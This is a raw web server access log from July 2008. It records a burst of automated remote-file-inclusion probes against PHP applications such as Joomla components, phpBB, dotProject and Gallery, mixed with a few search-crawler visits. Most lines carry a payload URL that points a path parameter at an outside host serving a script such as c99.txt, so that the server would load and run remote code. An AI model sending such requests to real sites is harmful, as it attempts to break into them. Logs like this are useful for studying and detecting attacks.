193.77.135.204 - - [20/Jul/2008:17:00:22 -0700] "GET /logs/access_080225.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://buqtery.cc/c99.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.246.91.250 - - [20/Jul/2008:17:00:23 -0700] "GET //administrator/components/com_webring/admin.webring.docs.php?component_dir=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
210.127.253.161 - - [20/Jul/2008:17:00:38 -0700] "GET /logs/access.log//components/com_simpleboard/file_upload.php?sbp=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.127.253.161 - - [20/Jul/2008:17:01:12 -0700] "GET /logs/access_080303.log//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.127.253.161 - - [20/Jul/2008:17:01:17 -0700] "GET /logs/access_080623.log///components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.127.253.161 - - [20/Jul/2008:17:01:18 -0700] "GET ///components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.127.253.161 - - [20/Jul/2008:17:01:18 -0700] "GET /logs///components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
63.247.139.189 - - [20/Jul/2008:17:02:11 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "galf.org"
63.247.139.189 - - [20/Jul/2008:17:02:11 -0700] "GET //include/admin.lib.inc.php?site_path=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "galf.org"
63.247.139.189 - - [20/Jul/2008:17:02:11 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "galf.org"
63.247.139.189 - - [20/Jul/2008:17:02:15 -0700] "GET /logs/access_080324.log//modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
63.247.139.189 - - [20/Jul/2008:17:02:15 -0700] "GET //modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
63.247.139.189 - - [20/Jul/2008:17:02:15 -0700] "GET /logs//modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
75.125.201.18 - - [20/Jul/2008:17:02:26 -0700] "GET /logs/access_071231.log/?thisdir=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
75.125.201.18 - - [20/Jul/2008:17:02:26 -0700] "GET /?thisdir=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 200 1048 "-" "libwww-perl/5.813" "www.galf.org"
75.125.201.18 - - [20/Jul/2008:17:02:27 -0700] "GET /logs/?thisdir=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 200 9232 "-" "libwww-perl/5.813" "www.galf.org"
75.125.201.18 - - [20/Jul/2008:17:02:33 -0700] "GET /logs/access_071022.log/?thisdir=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
74.6.22.185 - - [20/Jul/2008:17:02:46 -0700] "GET /logs/access_070917.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "galf.org"
200.55.216.70 - - [20/Jul/2008:17:02:49 -0700] "GET /logs/access_071231.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.15.155.201 - - [20/Jul/2008:17:03:00 -0700] "GET /logs/routines/fieldValidation.php?jssShopFileSystem=http://www.ecf.cl/portal/cache/rss40.xml?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.galf.org"
64.15.155.201 - - [20/Jul/2008:17:03:00 -0700] "GET /routines/fieldValidation.php?jssShopFileSystem=http://www.ecf.cl/portal/cache/rss40.xml?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.galf.org"
87.106.65.144 - - [20/Jul/2008:17:03:11 -0700] "GET /logs/access_071231.log/?thisdir=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.65.144 - - [20/Jul/2008:17:03:11 -0700] "GET /?thisdir=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 200 1048 "-" "libwww-perl/5.803" "www.galf.org"
87.106.65.144 - - [20/Jul/2008:17:03:11 -0700] "GET /logs/?thisdir=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 200 9232 "-" "libwww-perl/5.803" "www.galf.org"
63.247.139.189 - - [20/Jul/2008:17:03:17 -0700] "GET /logs/access_080630.log//modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
75.125.201.18 - - [20/Jul/2008:17:03:20 -0700] "GET /logs/access_071231.log/errors.php?error=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
75.125.201.18 - - [20/Jul/2008:17:03:20 -0700] "GET /errors.php?error=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
75.125.201.18 - - [20/Jul/2008:17:03:20 -0700] "GET /logs/errors.php?error=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
87.106.65.144 - - [20/Jul/2008:17:03:21 -0700] "GET /logs/access_071022.log/?thisdir=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
211.247.226.253 - - [20/Jul/2008:17:03:23 -0700] "GET /logs/access_080407.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://webshell.xpg.com.br/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
190.196.2.205 - - [20/Jul/2008:17:03:29 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
190.196.2.205 - - [20/Jul/2008:17:03:30 -0700] "GET /skin/zero_vote/error.php?dir=http://www.cafelecaire.com/gallery/data/blid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.106.65.144 - - [20/Jul/2008:17:03:30 -0700] "GET /logs/access_071231.log/errors.php?error=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.65.144 - - [20/Jul/2008:17:03:30 -0700] "GET /errors.php?error=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.65.144 - - [20/Jul/2008:17:03:30 -0700] "GET /logs/errors.php?error=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
75.125.201.18 - - [20/Jul/2008:17:03:30 -0700] "GET /logs/access_071022.log/errors.php?error=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
87.106.65.144 - - [20/Jul/2008:17:03:39 -0700] "GET /logs/access_071022.log/errors.php?error=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
75.125.201.18 - - [20/Jul/2008:17:04:23 -0700] "GET /logs/access_071231.log/?thisdir=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
75.125.201.18 - - [20/Jul/2008:17:04:23 -0700] "GET /?thisdir=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 200 1048 "-" "libwww-perl/5.813" "www.galf.org"
75.125.201.18 - - [20/Jul/2008:17:04:23 -0700] "GET /logs/?thisdir=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 200 9232 "-" "libwww-perl/5.813" "www.galf.org"
75.125.201.18 - - [20/Jul/2008:17:04:31 -0700] "GET /logs/access_071022.log/?thisdir=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
206.220.40.8 - - [20/Jul/2008:17:04:36 -0700] "GET /logs/access_080609.log/errors.php?error=http://www.radyo-sila.com//modules/postguestbook/styles/internal/images/osid6.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
206.220.40.8 - - [20/Jul/2008:17:04:36 -0700] "GET /logs/errors.php?error=http://www.radyo-sila.com//modules/postguestbook/styles/internal/images/osid6.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
206.220.40.8 - - [20/Jul/2008:17:04:36 -0700] "GET /errors.php?error=http://www.radyo-sila.com//modules/postguestbook/styles/internal/images/osid6.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
206.220.40.8 - - [20/Jul/2008:17:04:36 -0700] "GET /logs/errors.php?error=http://www.radyo-sila.com//modules/postguestbook/styles/internal/images/osid6.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
206.220.40.8 - - [20/Jul/2008:17:04:37 -0700] "GET /errors.php?error=http://www.radyo-sila.com//modules/postguestbook/styles/internal/images/osid6.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
206.220.40.8 - - [20/Jul/2008:17:04:37 -0700] "GET /logs/errors.php?error=http://www.radyo-sila.com//modules/postguestbook/styles/internal/images/osid6.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
206.220.40.8 - - [20/Jul/2008:17:04:37 -0700] "GET /logs/errors.php?error=http://www.radyo-sila.com//modules/postguestbook/styles/internal/images/osid6.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
206.220.40.8 - - [20/Jul/2008:17:04:37 -0700] "GET /errors.php?error=http://www.radyo-sila.com//modules/postguestbook/styles/internal/images/osid6.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
206.220.40.8 - - [20/Jul/2008:17:04:37 -0700] "GET /logs/access_080609.log/errors.php?error=http://www.radyo-sila.com//modules/postguestbook/styles/internal/images/osid6.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
206.220.40.8 - - [20/Jul/2008:17:04:37 -0700] "GET /logs/errors.php?error=http://www.radyo-sila.com//modules/postguestbook/styles/internal/images/osid6.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
206.220.40.8 - - [20/Jul/2008:17:04:37 -0700] "GET /logs/access_080609.log/errors.php?error=http://www.radyo-sila.com//modules/postguestbook/styles/internal/images/osid6.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.106.65.144 - - [20/Jul/2008:17:04:38 -0700] "GET /logs/access_071231.log/?thisdir=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.65.144 - - [20/Jul/2008:17:04:38 -0700] "GET /?thisdir=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 200 1048 "-" "libwww-perl/5.803" "www.galf.org"
87.106.65.144 - - [20/Jul/2008:17:04:38 -0700] "GET /logs/?thisdir=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 200 9232 "-" "libwww-perl/5.803" "www.galf.org"
206.220.40.8 - - [20/Jul/2008:17:04:41 -0700] "GET /logs/access_080609.log/errors.php?error=http://www.radyo-sila.com//modules/postguestbook/styles/internal/images/osid6.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
206.220.40.8 - - [20/Jul/2008:17:04:41 -0700] "GET /errors.php?error=http://www.radyo-sila.com//modules/postguestbook/styles/internal/images/osid6.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
206.220.40.8 - - [20/Jul/2008:17:04:41 -0700] "GET /logs/access_080609.log/errors.php?error=http://www.radyo-sila.com//modules/postguestbook/styles/internal/images/osid6.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
206.220.40.8 - - [20/Jul/2008:17:04:41 -0700] "GET /errors.php?error=http://www.radyo-sila.com//modules/postguestbook/styles/internal/images/osid6.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
206.220.40.8 - - [20/Jul/2008:17:04:41 -0700] "GET /logs/errors.php?error=http://www.radyo-sila.com//modules/postguestbook/styles/internal/images/osid6.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
206.220.40.8 - - [20/Jul/2008:17:04:42 -0700] "GET /logs/access_080609.log/errors.php?error=http://www.radyo-sila.com//modules/postguestbook/styles/internal/images/osid6.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
206.220.40.8 - - [20/Jul/2008:17:04:42 -0700] "GET /errors.php?error=http://www.radyo-sila.com//modules/postguestbook/styles/internal/images/osid6.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.106.65.144 - - [20/Jul/2008:17:04:47 -0700] "GET /logs/access_071022.log/?thisdir=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.65.144 - - [20/Jul/2008:17:04:57 -0700] "GET /logs/access_071231.log/errors.php?error=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.65.144 - - [20/Jul/2008:17:04:57 -0700] "GET /errors.php?error=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.65.144 - - [20/Jul/2008:17:04:57 -0700] "GET /logs/errors.php?error=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.15.8.80 - - [20/Jul/2008:17:05:04 -0700] "GET /logs/errors.php?error=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
67.15.8.80 - - [20/Jul/2008:17:05:04 -0700] "GET /logs/access_080602.log/errors.php?error=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
67.15.8.80 - - [20/Jul/2008:17:05:04 -0700] "GET /errors.php?error=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
87.106.65.144 - - [20/Jul/2008:17:05:06 -0700] "GET /logs/access_071022.log/errors.php?error=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.246.91.250 - - [20/Jul/2008:17:05:13 -0700] "GET /logs/access_070924.log//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
216.246.91.250 - - [20/Jul/2008:17:05:13 -0700] "GET //administrator/components/com_webring/admin.webring.docs.php?component_dir=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
216.246.91.250 - - [20/Jul/2008:17:05:13 -0700] "GET /logs//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
75.125.201.18 - - [20/Jul/2008:17:05:16 -0700] "GET //skin/zero_vote/error.php?dir=http://members.lycos.co.uk/dudi42/wtf.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.galf.org"
75.125.201.18 - - [20/Jul/2008:17:05:18 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://members.lycos.co.uk/dudi42/wtf.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.galf.org"
75.125.201.18 - - [20/Jul/2008:17:05:20 -0700] "GET /logs/access_071231.log/errors.php?error=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
75.125.201.18 - - [20/Jul/2008:17:05:20 -0700] "GET /errors.php?error=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
75.125.201.18 - - [20/Jul/2008:17:05:20 -0700] "GET /logs/errors.php?error=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
65.55.209.181 - - [20/Jul/2008:17:05:21 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.209.181 - - [20/Jul/2008:17:05:21 -0700] "GET /logs/?M=A HTTP/1.1" 200 9232 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
75.125.201.18 - - [20/Jul/2008:17:05:22 -0700] "GET /logs/access_080310.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
75.125.201.18 - - [20/Jul/2008:17:05:22 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
75.125.201.18 - - [20/Jul/2008:17:05:23 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
63.247.139.189 - - [20/Jul/2008:17:05:25 -0700] "GET /logs/access_070806.log//include/main.php?config[search_disp]=true&include_dir=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
63.247.139.189 - - [20/Jul/2008:17:05:25 -0700] "GET //include/main.php?config[search_disp]=true&include_dir=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
63.247.139.189 - - [20/Jul/2008:17:05:25 -0700] "GET /logs//include/main.php?config[search_disp]=true&include_dir=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
75.125.201.18 - - [20/Jul/2008:17:05:27 -0700] "GET /logs/access_071022.log/errors.php?error=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
87.106.65.144 - - [20/Jul/2008:17:05:28 -0700] "GET /logs/access_080310.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.65.144 - - [20/Jul/2008:17:05:29 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.65.144 - - [20/Jul/2008:17:05:29 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
210.127.253.161 - - [20/Jul/2008:17:05:38 -0700] "GET /logs/access_080616.log///components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.15.8.80 - - [20/Jul/2008:17:05:55 -0700] "GET /logs/access_080630.log/errors.php?error=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.15.155.201 - - [20/Jul/2008:17:05:57 -0700] "GET /logs/dotproject/modules/admin/vw_usr_roles.php?baseDir=http://www.ecf.cl/portal/cache/rss40.xml?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.galf.org"
64.15.155.201 - - [20/Jul/2008:17:05:58 -0700] "GET /dotproject/modules/admin/vw_usr_roles.php?baseDir=http://www.ecf.cl/portal/cache/rss40.xml?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.galf.org"
200.29.4.54 - - [20/Jul/2008:17:06:13 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://buqtery.cc/c99.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.246.91.250 - - [20/Jul/2008:17:06:16 -0700] "GET /logs/access_080609.log//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://cabinet-chapuis.info/graphisme/images/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
87.106.65.144 - - [20/Jul/2008:17:06:17 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.65.144 - - [20/Jul/2008:17:06:17 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.65.144 - - [20/Jul/2008:17:06:27 -0700] "GET /logs/access_080310.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.65.144 - - [20/Jul/2008:17:06:28 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.65.144 - - [20/Jul/2008:17:06:28 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
75.125.201.18 - - [20/Jul/2008:17:06:38 -0700] "GET /logs/access_070827.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
75.125.201.18 - - [20/Jul/2008:17:06:40 -0700] "GET /logs/access_080310.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
75.125.201.18 - - [20/Jul/2008:17:06:40 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
75.125.201.18 - - [20/Jul/2008:17:06:41 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
189.73.196.247 - - [20/Jul/2008:17:06:42 -0700] "GET /index.php?pagina=http://h1.ripway.com/heidik/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
87.106.65.144 - - [20/Jul/2008:17:06:43 -0700] "GET /logs/access_070827.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
210.127.253.161 - - [20/Jul/2008:17:06:50 -0700] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.127.253.161 - - [20/Jul/2008:17:06:50 -0700] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://www.moonok.com/bbs//r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
63.247.139.189 - - [20/Jul/2008:17:07:08 -0700] "GET //modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
72.29.87.80 - - [20/Jul/2008:17:07:21 -0700] "GET /logs/access_080407.log//init_basic.php?GALLERY_BASEDIR=http://www.hotlinkfiles.com/files/1605016_lfsly/id4.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.87.80 - - [20/Jul/2008:17:07:21 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://www.hotlinkfiles.com/files/1605016_lfsly/id4.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.87.80 - - [20/Jul/2008:17:07:21 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.hotlinkfiles.com/files/1605016_lfsly/id4.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.87.80 - - [20/Jul/2008:17:07:40 -0700] "GET /logs/access_080407.log//init_basic.php?GALLERY_BASEDIR=http://www.hotlinkfiles.com/files/1605016_lfsly/id4.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.87.80 - - [20/Jul/2008:17:07:40 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://www.hotlinkfiles.com/files/1605016_lfsly/id4.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.87.80 - - [20/Jul/2008:17:07:40 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.hotlinkfiles.com/files/1605016_lfsly/id4.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
75.125.201.18 - - [20/Jul/2008:17:07:43 -0700] "GET /logs/access_070827.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.andreas-geschier.de/components/com_performs/skins/tabular/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.galf.org"
